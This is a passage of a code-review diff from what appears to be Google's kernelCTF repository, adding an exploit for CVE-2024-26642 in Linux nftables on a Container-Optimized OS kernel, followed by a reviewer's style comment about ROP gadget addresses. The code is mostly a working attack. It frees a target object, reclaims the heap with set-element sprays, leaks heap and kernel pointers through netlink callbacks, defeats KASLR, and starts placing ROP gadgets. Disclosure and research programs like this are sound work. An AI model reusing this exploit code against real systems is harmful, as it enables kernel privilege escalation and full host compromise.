pocs/linux/kernelctf/CVE-2024-26642_cos/exploit/cos-105-17412.294.23/exploit.c

```diff
@@ -0,0 +1,502 @@
+    
+    //step 4
+    //delete target obj
+    del_obj(socket, table, target_obj, NFT_OBJECT_CT_EXPECT);
+    sleep(2);
+    //step 5
+    //get heap back
+    for(i=0;i<0x1000;i++){
+        //printf("%d\n",i);
+        *(uint64_t *)pad = i;
+        hash_key = i;
+        new_setelem_with_elemdata(socket, table, hash_set, pad, 0xa1, &hash_key, 8, NULL, 0,0);
+    }
+    //step 6
+    //call elem_flush to free all the elements of the pipapo set,  make setelem->udata_len = 0xfc
+    elem_flush(socket, table, pipapo_set);
+    sleep(2);
+    //step 7 Get leak data
+    
+    struct nl_sock * socket2 = nl_socket_alloc();
+    if(nfnl_connect(socket2)<0){
+        printf("nfnl_connect fail!\n");
+        return 0;
+    }
+    //function nl_callback_find_target_setelem will be called once we call nl_recvmsgs_default
+    //check the api documents and the source code for details:
+    //nl_socket_modify_cb:  https://www.infradead.org/~tgr/libnl/doc/api/group__socket.html#gaeee66d6edef118209c7e7f1e3d393448
+    //nl_recvmsgs_default:  https://www.infradead.org/~tgr/libnl/doc/api/group__send__recv.html#ga49b150fbb38a00444d5f6e323f05a2a1
+    //setup a callback function which will examine data to find the leaks from step 7
+    nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
+    for(i=0;i<0x1000;i++){
+        hash_key = i;
+        get_setelem(socket2, table, hash_set, &hash_key, 8);
+        nl_recvmsgs_default(socket2);
+        nl_recvmsgs_default(socket2);
+    }
+    uint64_t obj_a = *(uint64_t *)&leak_data[0xcb];
+    uint64_t obj_b = *(uint64_t *)&leak_data[0xcb+8];
+    printf("leak obj A heap : %llx\n",obj_a);
+    printf("leak obj B heap : %llx\n",obj_b);
+    
+    //step 8 Delete all the set elements created in step 5
+    elem_flush(socket, table, hash_set);
+    sleep(2);
+    *(uint64_t *)&pad[0x20] = obj_a + 0x80; 
+    spray_tables(socket,0x400, pad, 0xcc);
+    printf("spray finish\n");
+    hash_key = 0xdeadbeef;
+    //function nl_callback_leak_ops will be called once we call nl_recvmsgs_default
+    //check the api documents and the source code for details:
+    //nl_socket_modify_cb:  https://www.infradead.org/~tgr/libnl/doc/api/group__socket.html#gaeee66d6edef118209c7e7f1e3d393448
+    //nl_recvmsgs_default:  https://www.infradead.org/~tgr/libnl/doc/api/group__send__recv.html#ga49b150fbb38a00444d5f6e323f05a2a1
+    //step 10
+    //setup a callback function which will examine data to find the leaks from step 10
+    nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_leak_ops, NULL);
+    get_setelem(socket2, table, hash_set_2, &hash_key,8);
+    nl_recvmsgs_default(socket2);
+    nl_recvmsgs_default(socket2);
+    printf("Leak end.\n");
+    printf("Start preparing ROP gadget in heap.\n");
+    kernel_off = leak_ops - 0xFFFFFFFF82ACB840;
+    char *ops = malloc(0x100);
+    //ops->dump
+    *(uint64_t *)&ops[0x40] = kernel_off + 0xFFFFFFFF81519693;//leave ; ret
```

Comment:
Consider using `#define`s instead of adding addresses directly. Please take a look at [our style guide](https://google.github.io/security-research/kernelctf/style_guide#rop-chains) about the expected format.